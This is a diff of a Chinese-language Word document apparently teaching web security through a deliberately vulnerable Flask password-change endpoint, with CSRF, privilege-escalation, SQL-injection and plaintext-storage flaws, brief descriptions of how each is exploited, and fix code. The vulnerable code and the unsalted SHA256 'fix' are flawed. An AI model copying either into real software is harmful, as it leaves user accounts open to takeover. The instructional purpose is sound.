+        <w:br/>
+        <w:t xml:space="preserve">    # ⚠️ 漏洞4：无Referer验证 → 不检查请求来源</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    # ⚠️ 漏洞5：SQL注入 → 字符串拼接</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    # ⚠️ 漏洞6：密码明文存储 → 数据库直接存储明文</w:t>
+        <w:br/>
         <w:br/>
         <w:t xml:space="preserve">    sql = f"UPDATE users SET password = '{new_password}' WHERE username = '{username}'"</w:t>
         <w:br/>
         <w:t xml:space="preserve">    c.execute(sql)</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    conn.commit()</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    return redirect("/profile")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1147,7 +1416,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>5.2 六个安全漏洞一览</w:t>
+        <w:t>6.2 六个安全漏洞一览</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1232,7 +1501,7 @@
                 <w:color w:val="FFFFFF"/>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>说明</w:t>
+              <w:t>攻击利用方式</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1282,7 +1551,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>高危</w:t>
+              <w:t>🔴高危</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1298,7 +1567,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>任意网站可伪造提交密码修改表单</w:t>
+              <w:t>攻击者构造恶意HTML页面，诱导已登录用户访问，自动提交修改密码表单</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1348,7 +1617,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>高危</w:t>
+              <w:t>🔴高危</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1364,7 +1633,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>直接设置新密码，暴力破解即可修改</w:t>
+              <w:t>知道用户名即可直接修改密码，暴力枚举+社工即可攻破</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1414,7 +1683,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>高危</w:t>
+              <w:t>🔴高危</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1430,7 +1699,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>可修改任意用户的密码</w:t>
+              <w:t>已登录用户可修改任意用户的密码（username由表单提交）</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1480,7 +1749,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>中危</w:t>
+              <w:t>🟡中危</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1496,7 +1765,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>不检查请求来源URL</w:t>
+              <w:t>无法区分请求来自本站还是来自攻击者的恶意页面</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1530,7 +1799,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>密码明文传输</w:t>
+              <w:t>SQL注入</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1546,7 +1815,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>中危</w:t>
+              <w:t>🔴高危</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1562,7 +1831,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>HTTP传输密码可被中间人截获</w:t>
+              <w:t>username参数直接拼接SQL语句，可猜测/绕过</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1596,7 +1865,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>SQL注入</w:t>
+              <w:t>明文存储</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1612,7 +1881,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>高危</w:t>
+              <w:t>🟡中危</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1628,7 +1897,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>username参数直接拼接SQL语句</w:t>
+              <w:t>数据库直接存储明文密码，数据泄露后密码完全暴露</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1639,7 +1908,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>第六章  修复方案详解（含代码）</w:t>
+        <w:t>第七章  修复方案详解（含完整代码）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1647,7 +1916,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>6.1 修复1：CSRF Token验证（核心）</w:t>
+        <w:t>7.1 修复1：CSRF Token验证（核心）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1660,12 +1929,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>✅ 修复：每个表单生成唯一的CSRF Token，提交时验证匹配</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>登录时生成Token存入Session：</w:t>
+        <w:t>✅ 登录时生成随机Token存入Session，表单提交时匹配验证</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1678,14 +1942,44 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t># 登录成功时生成CSRF Token</w:t>
+        <w:t># 登录成功时：</w:t>
         <w:br/>
         <w:t>session["csrf_token"] = uuid.uuid4().hex</w:t>
+        <w:br/>
+        <w:br/>
+        <w:t># 表单中：</w:t>
+        <w:br/>
+        <w:t>&lt;input type="hidden" name="csrf_token" value="{{ session.csrf_token }}"&gt;</w:t>
+        <w:br/>
+        <w:br/>
+        <w:t># 后端验证：</w:t>
+        <w:br/>
+        <w:t>token = request.form.get("csrf_token", "")</w:t>
+        <w:br/>
+        <w:t>if token != session.get("csrf_token", ""):</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    return "CSRF Token验证失败，请刷新页面重试"</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
       <w:r>
-        <w:t>表单中加入隐藏字段：</w:t>
+        <w:t>7.2 修复2：Session绑定（防越权改密）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+        <w:shd w:fill="C8E6C9" w:val="clear"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>✅ 只能修改当前登录用户的密码，禁止修改他人</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1698,29 +1992,11 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>&lt;input type="hidden" name="csrf_token" value="{{ session.csrf_token }}"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>后端验证Token：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-        <w:shd w:fill="E8F5E9" w:val="clear"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>token = request.form.get("csrf_token", "")</w:t>
+        <w:t>if username != session["username"]:</w:t>
         <w:br/>
-        <w:t>if token != session.get("csrf_token", ""):</w:t>
+        <w:t xml:space="preserve">    audit_logger.warning(f"越权改密被拒: {session['username']}→{username}")</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    return "CSRF Token验证失败"</w:t>
+        <w:t xml:space="preserve">    return "无权修改他人密码"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1728,7 +2004,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>6.2 修复2：验证请求来源（Referer）</w:t>
+        <w:t>7.3 修复3：Referer验证（防CSRF）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1741,7 +2017,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>✅ 修复：检查Referer头是否为本站点</w:t>
+        <w:t>✅ 验证请求来源是否为本站点</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1756,7 +2032,9 @@
         </w:rPr>
         <w:t>referer = request.headers.get("Referer", "")</w:t>
         <w:br/>
-        <w:t>if not referer.startswith(request.host_url):</w:t>
+        <w:t>if not referer or not referer.startswith(request.host_url):</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    audit_logger.warning(f"CSRF被拒: Referer={referer}")</w:t>
         <w:br/>
         <w:t xml:space="preserve">    return "请求来源不合法"</w:t>
       </w:r>
@@ -1766,7 +2044,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>6.3 修复3：session与用户名绑定</w:t>
+        <w:t>7.4 修复4：参数化查询 + 密码哈希</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1779,43 +2057,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>✅ 修复：禁止修改他人的密码，必须与当前登录用户一致</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-        <w:shd w:fill="E8F5E9" w:val="clear"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>if username != session["username"]:</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">    return "无权修改他人密码"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>6.4 修复4：参数化查询防SQL注入</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-        <w:shd w:fill="C8E6C9" w:val="clear"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>✅ 修复：使用参数化查询替代字符串拼接</w:t>
+        <w:t>✅ 参数化查询防SQL注入 + SHA256哈希存储</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1833,6 +2075,10 @@
         <w:t>c.execute("UPDATE users SET password = ? WHERE username = ?",</w:t>
         <w:br/>
         <w:t xml:space="preserve">          (hashed_pw, username))</w:t>
+        <w:br/>
+        <w:t>conn.commit()</w:t>
+        <w:br/>
+        <w:t>audit_logger.info(f"密码修改成功: 用户={username}")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1840,7 +2086,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>6.5 修复5：完整修复代码</w:t>
+        <w:t>7.5 完整修复代码</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1872,14 +2118,23 @@
         <w:t xml:space="preserve">        return "缺少参数"</w:t>
         <w:br/>
         <w:br/>
-        <w:t xml:space="preserve">    # ✅ 修复1：验证只能修改自己的密码</w:t>
+        <w:t xml:space="preserve">    # ✅ 修复1：CSRF Token验证</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    token = request.form.get("csrf_token", "")</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    if token != session.get("csrf_token", ""):</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">        return "CSRF Token验证失败"</w:t>
+        <w:br/>
+        <w:br/>
+        <w:t xml:space="preserve">    # ✅ 修复2：防越权（只能修改自己的密码）</w:t>
         <w:br/>
         <w:t xml:space="preserve">    if username != session["username"]:</w:t>
         <w:br/>
         <w:t xml:space="preserve">        return "无权修改他人密码"</w:t>
         <w:br/>
         <w:br/>
-        <w:t xml:space="preserve">    # ✅ 修复2：验证Referer防CSRF</w:t>
+        <w:t xml:space="preserve">    # ✅ 修复3：Referer验证防CSRF</w:t>
         <w:br/>
         <w:t xml:space="preserve">    referer = request.headers.get("Referer", "")</w:t>
         <w:br/>
@@ -1888,16 +2143,7 @@
         <w:t xml:space="preserve">        return "请求来源不合法"</w:t>
         <w:br/>
         <w:br/>
-        <w:t xml:space="preserve">    # ✅ 修复3：验证CSRF Token</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">    token = request.form.get("csrf_token", "")</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">    if token != session.get("csrf_token", ""):</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">        return "CSRF Token验证失败"</w:t>
-        <w:br/>
-        <w:br/>
-        <w:t xml:space="preserve">    # ✅ 修复4：参数化查询</w:t>
+        <w:t xml:space="preserve">    # ✅ 修复4：参数化查询 + 密码哈希</w:t>
         <w:br/>
         <w:t xml:space="preserve">    hashed_pw = hashlib.sha256(new_password.encode()).hexdigest()</w:t>
         <w:br/>
@@ -1921,7 +2167,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>第七章  修复前后代码对比</w:t>
+        <w:t>第八章  修复前后代码对比</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -2037,7 +2283,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>✅ uuid.uuid4().hex + session校验</w:t>
+              <w:t>✅ uuid生成 + Session校验</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2087,7 +2333,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>✅ 必须与session用户名匹配</w:t>
+              <w:t>✅ 必须与Session用户名匹配（防越权）</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2171,7 +2417,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>❌ 无验证</w:t>
+              <w:t>❌ 无任何验证</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2187,7 +2433,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>✅ 验证Referer头</w:t>
+              <w:t>✅ 验证Referer来源</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2321,7 +2567,7 @@
               <w:rPr>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t>❌ 无日志</w:t>
+              <w:t>❌ 无日志记录</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2349,7 +2595,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>完整修复代码对比</w:t>
+        <w:t>核心代码对比</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2358,7 +2604,7 @@
           <w:b/>
           <w:color w:val="D32F2F"/>
         </w:rPr>
-        <w:t>有漏洞版本（app.py）：</w:t>
+        <w:t>有漏洞版本（app.py — 仅22行）：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2383,24 +2629,29 @@
         <w:br/>
         <w:t xml:space="preserve">    new_password = request.form.get("new_password", "")</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    # ⚠️ 无任何校验——直接更新密码</w:t>
+        <w:t xml:space="preserve">    if not username or not new_password:</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">        return "缺少参数"</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    # ⚠️ 无CSRF Token / 无原密码 / 无越权校验 / 无Referer</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    # ⚠️ 明文存储 + SQL注入</w:t>
         <w:br/>
         <w:t xml:space="preserve">    sql = f"UPDATE users SET password = '{new_password}' WHERE username = '{username}'"</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    c.execute(sql)</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">    conn.commit()</w:t>
+        <w:t xml:space="preserve">    c.execute(sql); conn.commit()</w:t>
         <w:br/>
         <w:t xml:space="preserve">    return redirect("/profile")</w:t>
       </w:r>
     </w:p>
+    <w:p/>
     <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:color w:val="2E7D32"/>
         </w:rPr>
-        <w:t>修复版本（app_fixed.py）：</w:t>
+        <w:t>修复版本（app_fixed.py — 完整校验）：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2421,13 +2672,18 @@
         <w:br/>
         <w:t xml:space="preserve">        return redirect("/login")</w:t>
         <w:br/>
+        <w:t xml:space="preserve">    username = request.form.get("username", "")</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    new_password = request.form.get("new_password", "")</w:t>
+        <w:br/>
+        <w:br/>
         <w:t xml:space="preserve">    # ✅ CSRF Token验证</w:t>
         <w:br/>
         <w:t xml:space="preserve">    if token != session.get("csrf_token", ""):</w:t>
         <w:br/>
         <w:t xml:space="preserve">        return "CSRF Token验证失败"</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    # ✅ 只能修改自己的密码</w:t>
+        <w:t xml:space="preserve">    # ✅ 防越权：只能修改自己的密码</w:t>
         <w:br/>
         <w:t xml:space="preserve">    if username != session["username"]:</w:t>
         <w:br/>
@@ -2439,11 +2695,11 @@
         <w:br/>
         <w:t xml:space="preserve">        return "请求来源不合法"</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    # ✅ 参数化查询</w:t>
+        <w:t xml:space="preserve">    # ✅ 参数化查询 + SHA256</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    hashed_pw = hashlib.sha256(new_password.encode()).hexdigest()</w:t>
+        <w:t xml:space="preserve">    c.execute("UPDATE users SET password = ? WHERE username = ?",</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    c.execute("UPDATE users SET password = ? WHERE username = ?", (hashed_pw, username))</w:t>
+        <w:t xml:space="preserve">              (hashlib.sha256(new_password.encode()).hexdigest(), username))</w:t>
         <w:br/>
         <w:t xml:space="preserve">    conn.commit()</w:t>
         <w:br/>
@@ -2455,7 +2711,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>第八章  安全编码规范总结</w:t>
+        <w:t>第九章  安全编码规范总结</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2468,7 +2724,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>所有涉及数据修改的POST请求必须包含CSRF Token，Token应为随机生成且绑定用户Session。</w:t>
+        <w:t>所有涉及数据修改的POST请求必须包含CSRF Token，Token应为随机生成且绑定用户Session，每次提交后更新。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2481,7 +2737,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>校验请求的Referer或Origin头，确保请求来自本站点。</w:t>
+        <w:t>校验请求的Referer或Origin头，确保请求来自本站点，拒绝跨域请求。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2494,7 +2750,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>用户只能修改自己的资源，不能越权操作他人数据。</w:t>
+        <w:t>用户只能修改自己的资源密码，不能越权操作他人数据。session中的username必须与提交的username一致。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2502,12 +2758,12 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>原则四：敏感操作二次确认</w:t>
+        <w:t>原则四：参数化查询</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>修改密码等敏感操作应要求用户提供原密码或验证码。</w:t>
+        <w:t>永远不要拼接SQL字符串，使用参数化查询（?占位符）防止SQL注入。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2515,12 +2771,12 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>原则五：参数化查询</w:t>
+        <w:t>原则五：密码安全存储</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>永远不要拼接SQL字符串，使用参数化查询防止SQL注入。</w:t>
+        <w:t>密码不应明文存储，应使用SHA256或bcrypt等哈希算法加盐存储，即使数据库泄露也无法还原密码。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2528,38 +2784,12 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>原则六：密码安全存储</w:t>
+        <w:t>原则六：审计日志</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>密码不应明文存储，应使用SHA256/bcrypt等哈希算法加盐存储。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>原则七：SameSite Cookie</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>设置Cookie的SameSite属性为Strict或Lax，限制跨站请求携带Cookie。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>原则八：审计日志</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>所有敏感操作必须记录日志，包含用户、时间、IP、操作内容。</w:t>
+        <w:t>所有敏感操作（登录、改密、删除用户）必须记录日志，包含用户名、时间、IP、操作内容，支持安全溯源。</w:t>
       </w:r>
     </w:p>
     <w:p/>
